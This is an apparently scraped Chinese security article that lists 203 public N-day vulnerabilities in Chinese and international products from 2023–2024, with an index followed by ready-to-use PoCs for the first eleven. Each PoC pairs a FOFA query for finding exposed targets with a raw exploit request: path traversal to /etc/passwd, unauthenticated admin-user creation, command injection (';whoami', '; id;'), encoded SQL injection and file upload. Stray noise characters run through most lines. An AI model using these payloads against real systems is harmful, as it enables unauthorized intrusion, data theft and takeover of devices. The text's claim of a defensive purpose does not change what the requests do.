互联网公开漏洞整理202309-202406
- ~% u; l4 M$ B7 {& y/ X道一安全 2024-06-05 07:41 北京7 O& `: M) D8 y4 c2 T3 u' z
以下文章来源于网络安全新视界 ,作者网络安全新视界
6 t( p# H; F7 d
8 K/ m9 @. R4 y8 M. l. ~, T" ?) C发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。6 g2 p# I( |8 G& F
3 a' x$ p3 E7 x) J漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
8 r+ K$ u0 y* f5 S. g J9 y% @3 N4 z' _6 o4 k+ F- v3 g4 U2 T
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
: P* x) Z/ j7 q X G8 U2 R# v) q9 X4 o4 m9 M
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。" C l9 `7 n# O# h( v; {$ h5 f
Q3 H/ ?* `& G" P! o
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。) x5 P8 `; g [
" E Z& J' T* ^( V$ E
. ^3 W& }& F% f- Y: |
声明
1 O7 M) y! p. G. W6 U9 H0 K- S7 {; s& I( o( g( B$ d" F4 W. O0 S
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
- O- A! E0 P* h+ S7 o `: {2 E, h# w& o7 d1 I1 ]& u- {
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。) \ {. |& S% {& B
0 `! d* o* n& j9 U+ f
- m3 _" v4 m4 A; S
3 \$ j5 `; i" F; b0 D$ t4 I目录% F- ^1 q5 e2 d4 w1 R
$ I) F- w' q; ?# Y% r5 J4 m01 A' ^" B& l: f3 ~5 U; T
4 t: d* J6 \3 d; E* k5 y1. StarRocks MPP数据库未授权访问
$ ^; O. ?+ S5 E' Z X0 B1 Z& w2. Casdoor系统static任意文件读取6 ^; Q2 [5 I/ G
3. EasyCVR智能边缘网关 userlist 信息泄漏
* ~' K3 \/ R1 b3 f' m4. EasyCVR视频管理平台存在任意用户添加) i3 G9 k& W. b7 j! v0 Q) |. K
5. NUUO NVR 视频存储管理设备远程命令执行
8 p6 Z9 h8 K# a6. 深信服 NGAF 任意文件读取. y5 L Q4 f6 j
7. 鸿运主动安全监控云平台任意文件下载
. q) `' N0 m2 U% A6 z5 E4 \* q8. 斐讯 Phicomm 路由器RCE' Z: t, C p/ u0 M0 U& a
9. 稻壳CMS keyword 未授权SQL注入
& V9 ], G% J/ c# y' I& I2 E10. 蓝凌EIS智慧协同平台api.aspx任意文件上传/ [* w% X7 C" H6 Y
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
' o# g4 k( i3 D1 d5 } D# j" f12. Jorani < 1.0.2 远程命令执行
$ |+ U" c. Y+ V* |& S! p3 h13. 红帆iOffice ioFileDown任意文件读取' L& S! c* |4 j- A; m- A) ?! x2 ~5 r
14. 华夏ERP(jshERP)敏感信息泄露
9 g, g* T3 Q' \4 ^/ l8 l: E15. 华夏ERP getAllList信息泄露
% K/ T8 E( ?* V7 [6 ]% u1 _16. 红帆HFOffice医微云SQL注入
. E9 D% g3 w# S- d* [3 z17. 大华 DSS itcBulletin SQL 注入
( q% c/ h4 K, Y# ]18. 大华 DSS 数字监控系统 user_edit.action 信息泄露. F( [! Z/ o2 s* p$ M
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
m! }7 L5 y9 H20. 大华ICC智能物联综合管理平台任意文件读取
& S! e+ G, s' d& w21. 大华ICC智能物联综合管理平台random远程代码执行" B- ], S7 w2 y( B
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
0 l2 x, `0 A- O* K23. 大华ICC智能物联综合管理平台 fastjson远程代码执行$ E, L0 z& w9 N
24. 用友NC 6.5 accept.jsp任意文件上传) T/ I4 S% s9 i3 V! M
25. 用友NC registerServlet JNDI 远程代码执行
r" o: [5 _- U# V( q, r# f26. 用友NC linkVoucher SQL注入+ x% e* ~- B. u. |0 R
27. 用友 NC showcontent SQL注入
+ s+ F4 ^0 V1 c8 l* ^" B28. 用友NC grouptemplet 任意文件上传
2 S/ b) U7 C9 a+ k+ D29. 用友NC down/bill SQL注入
+ Y" g. S: M5 V* ?8 B5 ?! d! }30. 用友NC importPml SQL注入
% p0 {9 F$ r0 H( g1 a* `31. 用友NC runStateServlet SQL注入
* z1 f& F" p1 s8 C; D0 E+ h+ s32. 用友NC complainbilldetail SQL注入2 ?7 `* w, o, K- b+ U
33. 用友NC downTax/download SQL注入
9 `9 a9 N* A% ~0 U, Q& x34. 用友NC warningDetailInfo接口SQL注入0 x( u @' d9 `: y2 F1 @
35. 用友NC-Cloud importhttpscer任意文件上传& Q% x7 Y4 J1 D& {0 |
36. 用友NC-Cloud soapFormat XXE# L% ^6 U% w# i
37. 用友NC-Cloud IUpdateService XXE
4 A" N2 M. A! l) ^) H4 f38. 用友U8 Cloud smartweb2.RPC.d XXE
* o7 A3 R: x# f# V% H1 l0 ? G39. 用友U8 Cloud RegisterServlet SQL注入1 ? B6 q# F6 A# T4 P r
40. 用友U8-Cloud XChangeServlet XXE& x( j. `. h) N1 K1 _! P' }
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入$ d; \6 K3 n; o' p# W
42. 用友GRP-U8 SmartUpload01 文件上传
3 W0 Z; Q7 n1 K* l43. 用友GRP-U8 userInfoWeb SQL注入致RCE, u3 j" m# ?% Y. i1 F
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
+ a; f1 O3 R* t6 H I- \45. 用友GRP-U8 ufgovbank XXE
) C# E3 J) E( g5 b7 |0 w S8 j% Y46. 用友GRP-U8 sqcxIndex.jsp SQL注入$ X% A' g$ A* \5 w# g6 I
47. 用友GRP A++Cloud 政府财务云 任意文件读取/ |0 J/ C4 Z1 r1 R
48. 用友U8 CRM swfupload 任意文件上传. q9 l+ E9 N2 ^! l$ n2 a6 C# P
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 M- A2 @+ r8 d @8 t50. QDocs Smart School 6.4.1 filterRecords SQL注入! p2 ?0 P" T0 k
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
, i9 p; |- W. R; _9 {, f, Q52. 泛微E-Office json_common.php sql注入
* [5 D3 w5 v; D v& d53. 迪普 DPTech VPN Service 任意文件上传/ u2 x0 d& N5 Y! O
54. 畅捷通T+ getstorewarehousebystore 远程代码执行' M4 p. C0 J: @' q6 l
55. 畅捷通T+ getdecallusers信息泄露' V* [! ]9 S! t
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE" l. t' s$ g5 A! Y
57. 畅捷通T+ keyEdit.aspx SQL注入
X% i5 x- d1 L7 b3 d( g58. 畅捷通T+ KeyInfoList.aspx sql注入
! O5 p' ^# A3 h+ J59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行6 [1 {7 a4 M* Q3 O0 ^% x5 [
60. 百卓Smart管理平台 importexport.php SQL注入( C; g; n+ H6 M# D( W
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
. `, \+ @- t6 Z+ A8 Q62. IP-guard WebServer 远程命令执行9 Y4 N3 a$ Y* ~, v% r
63. IP-guard WebServer任意文件读取) c- n5 X8 I( z9 E
64. 捷诚管理信息系统CWSFinanceCommon SQL注入2 |8 q1 E: b; i4 q6 _3 z6 O
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过! c7 G6 Z+ u. F7 B; D. ]
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入5 o1 r! b- E% A5 J
67. 万户ezOFFICE wpsservlet任意文件上传7 Z6 a. |1 f( {; Q8 m* w' e
68. 万户ezOFFICE wf_printnum.jsp SQL注入
% | I9 p. b1 v1 B/ ]/ G69. 万户 ezOFFICE contract_gd.jsp SQL注入! ]7 {" P2 v- z% P; s$ Q' w' ?8 `
70. 万户ezEIP success 命令执行
9 ]- h9 c, `' P. m+ q- H! n71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
" g$ |& ~+ R4 U7 z E8 q" |+ L72. 致远OA getAjaxDataServlet XXE) {7 ]6 n) z1 r) c
73. GeoServer wms远程代码执行
: A, ?7 z. Q2 l |5 t74. 致远M3-server 6_1sp1 反序列化RCE
8 ~0 f& z! D4 _4 M) P* w* ~ v) d5 _75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
`& v" s l& |* o$ p76. 新开普掌上校园服务管理平台service.action远程命令执行
+ p- ^( i& J+ J9 H) K# f77. F22服装管理软件系统UploadHandler.ashx任意文件上传7 K4 M! L% x& E
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
5 O: O$ g2 j, P$ E( O79. BYTEVALUE 百为流控路由器远程命令执行, A* F* c) u/ K7 u, W3 A( |
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传" t* W3 q1 Q! I% F5 f. x
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
, C, m5 @( r; ]* N82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行) g* `6 c& A; M$ [8 K# D
83. JeecgBoot testConnection 远程命令执行* O! U2 M9 A$ s7 ~, w, |) g6 j8 A
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入3 {6 ]1 e5 _% t/ |) h2 n1 V5 A
85. SysAid On-premise< 23.3.36远程代码执行8 f' A# e @) `6 Y5 z0 H5 C' k" ~
86. 日本tosei自助洗衣机RCE
# c! U, h7 i' A- Q+ b& k87. 安恒明御安全网关aaa_local_web_preview文件上传
, G& y" Z" L* N6 o- a7 [88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行! N) {5 s( i: ^
89. 致远互联FE协作办公平台editflow_manager存在sql注入8 b# V8 S' h, L2 R4 v+ X
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
/ [1 d, f- u& l0 K% M' l0 R# ]5 u91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取4 i2 W3 m a6 ^6 m0 Y# h% L
92. 海康威视运行管理中心session命令执行
. s5 Q: C9 _3 L93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
) ]0 @: E& h- C; B94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
+ q1 j4 R5 T6 m. m" }95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
3 {8 N( S) ^9 k8 G [96. Apache OFBiz 18.12.11 groovy 远程代码执行2 c& `* G5 B& Y; b* L7 r, A
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行( v3 V& Y# ^4 Q
98. SpiderFlow爬虫平台远程命令执行
/ |5 Z& ~5 h3 U% \1 H99. Ncast盈可视高清智能录播系统busiFacade RCE
0 E& I8 ^% r- U4 @# M h, [100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
5 p& V: s; Y$ ?- X" ~( J$ z101. ivanti policy secure-22.6命令注入4 B$ M. C* n& Z. `( O7 \
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
" B0 z+ m: O r+ E* Y% s, ~103. Ivanti Pulse Connect Secure VPN XXE
! s% n5 V! ^& O" u& |104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
# ^) T# z, m J! R105. SpringBlade v3.2.0 export-user SQL 注入' e( h+ O" g- D% C
106. SpringBlade dict-biz/list SQL 注入4 ^: f5 G% V! y7 s
107. SpringBlade tenant/list SQL 注入7 {0 p) t! y! w [
108. D-Tale 3.9.0 SSRF% y' L- J# f8 c# h. d2 i
109. Jenkins CLI 任意文件读取. S+ x7 _) s- R7 m% I. V
110. Goanywhere MFT 未授权创建管理员
- E7 a6 V- F* W/ x; ~ i9 S/ f111. WordPress Plugin HTML5 Video Player SQL注入
6 c3 n) B5 _' n% q9 f, ~7 |) r3 \112. WordPress Plugin NotificationX SQL 注入$ C- F$ @! _, M6 z+ A+ M0 A
113. WordPress Automatic 插件任意文件下载和SSRF
- I; r" ?! \) @9 R1 Y114. WordPress MasterStudy LMS插件 SQL注入
# U5 ?( h7 f# M! y115. WordPress Bricks Builder <= 1.9.6 RCE
: G9 R" D5 |3 B3 R; W116. wordpress js-support-ticket文件上传- ]9 F& e: T2 s$ @- g( c9 @5 y9 x3 U @
117. WordPress LayerSlider插件SQL注入
8 `; ?) J' q% b6 d118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
3 W5 l0 G: C' A1 Q1 C/ r7 n+ J- s$ q119. 北京百绰智能S20后台sysmanageajax.php sql注入
6 r0 O/ E" m9 E- ~( S9 g) Y120. 北京百绰智能S40管理平台导入web.php任意文件上传
: ]3 Y1 ]( T( w121. 北京百绰智能S42管理平台userattestation.php任意文件上传( `( r/ U A9 u, O( r
122. 北京百绰智能s200管理平台/importexport.php sql注入8 T: g( m7 G& s" {& S
123. Atlassian Confluence 模板注入代码执行
6 p8 J! n* K& N& q# Y+ G! c124. 湖南建研工程质量检测系统任意文件上传
) g6 L1 _4 ^& q, l; K' s" i125. ConnectWise ScreenConnect身份验证绕过7 \# Y( _ a( F/ l3 e
126. Aiohttp 路径遍历
2 H6 @0 B' J. `8 T& u127. 广联达Linkworks DataExchange.ashx XXE
$ P0 l$ o5 ^7 ^7 C128. Adobe ColdFusion 反序列化1 v1 W) I1 `6 v+ i7 d' H( h+ b
129. Adobe ColdFusion 任意文件读取9 P6 S! f: L. @2 L, w; Y$ }" L' X
130. Laykefu客服系统任意文件上传
P% U q! \9 w( a131. Mini-Tmall <=20231017 SQL注入) z) _- G! Z, L: S3 G: Q
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过2 e1 H6 D. M& a1 T, X
133. H5 云商城 file.php 文件上传
; F# i: k1 b1 Z1 ? [, w; u134. 网康NS-ASG应用安全网关index.php sql注入
: P" q& N; P4 x! O& u8 ^: z2 j135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入( ^* v4 \) A8 y" p; }6 l( {$ E
136. NextChat cors SSRF
5 u; T7 _' X& N137. 福建科立迅通信指挥调度平台down_file.php sql注入" s0 j' v+ _$ K' E+ V4 e: V
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
- L1 K, R) u! v) T139. 福建科立讯通信指挥调度平台editemedia.php sql注入2 S+ `+ {' {! Y* H% ?, n( R
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
' w% S/ j/ I# @141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入' Q% K3 c9 Y/ J$ c
142. CMSV6车辆监控平台系统中存在弱密码
# B6 I8 o+ S8 u5 |" q143. Netis WF2780 v2.1.40144 远程命令执行
4 B8 l; i) M2 D; x% S144. D-Link nas_sharing.cgi 命令注入' C: t* n9 S6 j+ [, S4 r% y
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
' z$ K K" i0 t: \# t! H( g146. MajorDoMo thumb.php 未授权远程代码执行$ J* f( n) y3 G# W" u
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历& s+ [) _, _7 \( }( @' e
148. CrushFTP 认证绕过模板注入6 O4 B2 r/ a& @# A- `
149. AJ-Report开源数据大屏存在远程命令执行" A; J" v! _( v6 @3 r4 Y
150. AJ-Report 1.4.0 认证绕过与远程代码执行
' u' X1 e5 g5 ]6 |" U* k151. AJ-Report 1.4.1 pageList sql注入
; p9 l' K, L6 a" |152. Progress Kemp LoadMaster 远程命令执行
: j5 w" ^0 I2 z) M0 }6 w153. gradio任意文件读取
9 a) B5 x# O1 i+ N154. 天维尔消防救援作战调度平台 SQL注入1 r7 S" z5 b7 R' F w5 h( i
155. 六零导航页 file.php 任意文件上传9 x) H1 \' s7 s
156. TBK DVR-4104/DVR-4216 操作系统命令注入
! I' ?" I1 ^" Z" b6 P157. 美特CRM upload.jsp 任意文件上传9 C! t- j9 F( N
158. Mura-CMS-processAsyncObject存在SQL注入/ p; o+ k2 e1 J9 C/ `& i8 L
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
* y1 D' M& ?- `9 t160. Sonatype Nexus Repository 3目录遍历与文件读取
* j3 o( h, q) Y% X. r9 a, q161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
8 g1 s8 y9 W$ J1 N1 [: U s162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传# f! t. Y0 a7 ~7 p& T% F& c' s6 X
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
# P! T& l- `6 J# Y- R164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
- _. h' Z; |4 F165. OrangeHRM 3.3.3 SQL 注入; s* b$ r) f; ?; S- J9 f, v4 c3 v* k# f
166. 中成科信票务管理平台SeatMapHandler SQL注入1 N0 e1 w$ B. v+ a/ W3 T
167. 精益价值管理系统 DownLoad.aspx任意文件读取
: W% p" H* H1 ^( q7 v! S168. 宏景EHR OutputCode 任意文件读取
% K" H4 I: @' z9 _( u& ^6 W% c169. 宏景EHR downlawbase SQL注入4 d" F+ |/ n3 U$ N w1 u) F
170. 宏景EHR DisplayExcelCustomReport 任意文件读取) O' v! p( R& ^+ H9 m
171. 通天星CMSV6车载定位监控平台 SQL注入
2 g, j; x3 K6 I2 E172. DT-高清车牌识别摄像机任意文件读取: u4 l7 k6 v1 n! k7 F) S n" e
173. Check Point 安全网关任意文件读取/ ~2 O" i! V4 {( w' |1 b
174. 金和OA C6 FileDownLoad.aspx 任意文件读取4 K8 Q* x0 o8 H
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入5 E$ |3 O3 p1 {
176. 电信网关配置管理系统 rewrite.php 文件上传4 P4 y! d8 J* [ t5 A3 h
177. H3C路由器敏感信息泄露
2 X% i7 B! L; W& Q( t: k178. H3C校园网自助服务系统-flexfileupload-任意文件上传. Q+ K2 g8 J, y; i& r$ q( K
179. 建文工程管理系统存在任意文件读取
+ H2 Q; }/ }! c; v! E0 {180. 帮管客 CRM jiliyu SQL注入
8 M. o' T+ l7 O181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入2 L5 h9 A6 q% A
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
9 H* A/ a8 H4 f. |- U F183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
% h6 t7 N7 H6 {' Q) p9 m184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加) y* g; z2 Q4 @7 _; n; v
185. 瑞友天翼应用虚拟化系统SQL注入: o4 v2 F3 I0 B
186. F-logic DataCube3 SQL注入* r% c. z {% H+ y4 D; J
187. Mura CMS processAsyncObject SQL注入" D. l( G7 i7 m3 r' o
188. 叁体-佳会视频会议 attachment 任意文件读取- y) M7 \" o" r, k1 @+ b
189. 蓝网科技临床浏览系统 deleteStudy SQL注入9 y+ ^" l- I/ X& x2 [3 i& P t* {
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
0 q' O! V9 h$ M191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
* N0 A! V F) u, R' R4 d192. 富通天下外贸ERP UploadEmailAttr 任意文件上传, |$ e4 Z# \9 |0 c
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
- a8 C9 r" S% d- _# M( ?- B: n9 I194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传) F1 u3 W3 r* F- ]
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行3 G+ `, S: h/ p0 ~* f; I: k; t6 ?
196. 河南省风速科技统一认证平台密码重置
/ h; n" H; d3 b; T197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入, }. ~: x' N* y* v# `' {+ n
198. 阿里云盘 WebDAV 命令注入. @8 Q, s3 T! { @1 i1 U
199. cockpit系统assetsmanager_upload接口 文件上传1 z* E- W c/ L9 z
200. SeaCMS海洋影视管理系统dmku SQL注入% M3 u, [ P+ a
201. 方正全媒体新闻采编系统 binary SQL注入
: P9 I8 B* W+ t5 j. s% r202. 微擎系统 AccountEdit任意文件上传! o H# k8 j; t. y! V$ q
203. 红海云EHR PtFjk 文件上传 `" l! \. a$ n8 N$ }3 r$ R
9 z# h% k2 H" U2 j3 z) @POC列表# [( E" j4 j. x4 ?; n
, w1 l' y+ A' q0 c$ `$ v+ r
02
/ D2 e3 U, h8 i+ Q4 y/ \& L, h( W- g; L
1. StarRocks MPP数据库未授权访问
; w, Q6 A; D$ Q% hFOFA :title="StarRocks": ~) i1 r5 I) A; V# q5 g" T! e
GET /mem_tracker HTTP/1.1
' N2 F# [( {7 }/ ]! v% {Host: URL
2 _" D4 h' Y; x+ p0 J. ?
& r4 L: h9 ~7 s) c$ ?# ^
1 u, v/ m7 s/ B' k- Z) Q2. Casdoor系统static任意文件读取
: R6 b# r+ }: B; sFOFA :title="Casdoor"' Y% \, g' w! F1 S4 i6 P# D
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
$ ]. @/ u# }. }! ?& _# w) F* yHost: xx.xx.xx.xx:9999
3 F4 d/ |1 V2 M% n1 [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ q4 j2 ~3 s0 e. u4 p7 O0 Y/ {Connection: close
* B* h5 v5 L8 v/ d& G* r/ ZAccept: */*: H/ Y! e8 D" ]& v
Accept-Language: en ` I6 z6 Z2 n3 z; y
Accept-Encoding: gzip
. [- a. E+ C4 }) R# S% a4 V* o* g$ G$ u: d8 Y/ w! E( E. C s: ?6 a
( F) `( K5 P7 A8 ^8 y
3. EasyCVR智能边缘网关 userlist 信息泄漏/ Z1 T; t/ D7 x/ i" W0 ^! L
FOFA :title="EasyCVR"3 _8 ] L" f1 E
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
3 Y6 b2 ~, |8 a8 g! ZHost: xx.xx.xx.xx4 c' E3 H a2 l ~2 c1 g
" C. t) e" O' p7 ?1 _: ?, k8 h# j
) `6 N' E+ x2 o F4 v4 q6 s4. EasyCVR视频管理平台存在任意用户添加2 z! L( g3 U4 f8 }4 E+ ]
FOFA :title="EasyCVR"2 q/ Z( I( r4 z8 d, d- H! J' J3 Z- N
5 ]2 T) t7 i& o/ e- k6 |password更改为自己的密码md5
4 N+ d2 @1 n3 e O6 \' p" HPOST /api/v1/adduser HTTP/1.10 s6 u1 O# A n
Host: your-ip8 S( n" ?: K* P( S) r$ c
Content-Type: application/x-www-form-urlencoded; charset=UTF-87 [+ A8 D! @9 f6 W: D& y
2 ~3 O ], j* ]
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
# k! M! ?( V. T( c" I/ ]
; l% r8 F0 b9 k8 K s/ Y' n) n: @0 I1 y8 O
5. NUUO NVR 视频存储管理设备远程命令执行- T/ k$ s( w- _0 g: ^: h# z& H
FOFA:title="Network Video Recorder Login"
; d3 W5 Q! R: P0 ~GET /__debugging_center_utils___.php?log=;whoami HTTP/1.13 l% {/ s2 G: B/ A
Host: xx.xx.xx.xx! A& w( [& r8 q4 E! S7 c
# A9 ]1 L6 O4 r# |- Y8 U; a4 ]3 D2 V0 C+ ]
6. 深信服 NGAF 任意文件读取! E/ h# h* o6 Y; K
FOFA:title="SANGFOR | NGAF"
% W: \1 ]; v) x E& K$ E' \9 o. mGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
7 A1 V. W# J' b9 |Host:$ b( r4 F( o8 O( x. D
, S# i1 d3 Q: L4 D# S8 b' A3 ~
5 u% U7 Y# t; L7. 鸿运主动安全监控云平台任意文件下载
4 h: h' b* O' @4 AFOFA:body="./open/webApi.html"/ n* u6 A( ~1 _' \
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1& ~* ?* m. ]% h' h
Host:
( @3 m) e3 f9 t; n+ t* N, D3 H6 q% I6 E+ [8 Q
$ z( b/ n% c. G% B! L8. 斐讯 Phicomm 路由器RCE
- u; h6 M) I7 K9 b% h! CFOFA:icon_hash="-1344736688"$ y" R% N' x9 N! Z4 U% B
默认账号admin登录后台后,执行操作
+ `$ j' ^* h& g- T& {POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.10 n. n6 G7 ~' ?# n0 N9 \
Host: x.x.x.x: [) A' G% b+ P M* ~# k
Cookie: sysauth=第一步登录获取的cookie
. n4 ?+ E5 A0 \Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz" ?2 Y$ N! H; b! p
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36& ?7 A3 Q) K; B: d2 V
- p" z/ |( y% k; H5 b
------WebKitFormBoundaryxbgjoytz2 `( M" S) `* u0 f! z1 H
Content-Disposition: form-data; name="wifiRebootEnablestatus"
9 @1 g4 `6 ]$ t8 B1 e+ v. A' Y/ ]+ q6 r: V3 O7 ~
%s: k0 C% _% [, _& v
------WebKitFormBoundaryxbgjoytz* `! b: L* Q5 M! W3 I
Content-Disposition: form-data; name="wifiRebootrange"& I9 u! r1 F) N9 p% A" P
* x1 Z( V+ q: u12:00; id;
% a/ \2 A$ i1 t0 ~/ x; ~4 C------WebKitFormBoundaryxbgjoytz X- G+ M- q( f. \2 _# {: F
Content-Disposition: form-data; name="wifiRebootendrange"
" R W, d% a/ t6 A1 K7 |4 a* v( z/ Z/ r$ o! e; |# Q3 y, l
%s:, n* ? e+ b5 A
------WebKitFormBoundaryxbgjoytz
3 V3 {# U4 c7 `3 L& @9 yContent-Disposition: form-data; name="cururl2"- o; k7 j& _8 \& C! w! z3 n( g
. ~0 O* u* |4 U$ h* ]0 F. ]
y8 ]9 s1 ~) } r( D8 S" z% S" J q------WebKitFormBoundaryxbgjoytz--6 D# W2 k" F& r
/ P% E, s6 \8 x9 F9 i
2 V) d8 y" N) c1 c! \9. 稻壳CMS keyword 未授权SQL注入
; f# k8 X0 C: O$ r+ kFOFA:app="Doccms"
9 z/ M) c3 C- G# }$ X0 K4 F8 O V2 c4 @% PGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1" W! a3 Y5 W( F. y& f( {+ M
Host: x.x.x.x
( n( v5 |0 |& P6 d
$ v% i9 d( ~: {# n$ n6 [7 E& W; R) d! o2 s
payload为下列语句的二次Url编码
5 z f/ l, i$ h3 |* Z- ?( i( q4 L4 v y0 }
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#% E/ C2 ?) n2 G- y' O
3 E+ r7 s# P) i6 q) D- V10. 蓝凌EIS智慧协同平台api.aspx任意文件上传# B4 G+ Q7 c) H' a$ a
FOFA:icon_hash="953405444"" \- T( n' f4 i2 ?" E1 O
8 w0 K. ~: Q3 B% l
文件上传后响应中包含上传文件的路径1 J$ \0 y3 n5 ~: ?1 k) d$ w8 |) b
POST /eis/service/api.aspx?action=saveImg HTTP/1.1) u' m9 `# D. o; o9 _/ l
Host: x.x.x.x:xx
" z7 {, n; s2 D9 C* YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
6 F! Z, c2 F! m- i1 \: ^Content-Length: 197
. C/ U+ U {& P$ `: J! L* `' l6 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.90 l3 Y9 B3 D4 Z! ^1 _, k) b! k
Accept-Encoding: gzip, deflate
. X" A* y6 p R1 D) RAccept-Language: zh-CN,zh;q=0.9
6 f- q- t% F0 Z9 U: UConnection: close/ {( K, X$ f- I6 N! W0 z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu4 M7 G0 z0 D4 \
6 A: ~. ]! h1 {: l
------WebKitFormBoundaryxdgaqmqu
! x) V" j0 i( K) ~0 CContent-Disposition: form-data; name="file"filename="icfitnya.txt"5 C" J; {! D8 `- ^- t
Content-Type: text/html7 h# ^+ C& z# |1 { z' s( |" I
0 y4 v$ P/ f" O5 I |jmnqjfdsupxgfidopeixbgsxbf: b. b6 }9 k' @1 e3 I0 P8 ^ v
------WebKitFormBoundaryxdgaqmqu--
1 D7 l) |0 |; Z2 M
2 [) D: }% R5 Y% _5 I/ }
( o0 l# o: |: `. b k6 N11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入7 d( a6 C/ e# m0 V" Z4 l
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
0 ]2 U) b+ j n/ S) L" _0 aGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
8 l+ e; N; e+ _. c a3 o2 @Host: 127.0.0.1
$ C0 D* m# ^- {* ?! v0 f6 ZPragma: no-cache8 u, g% L F; T
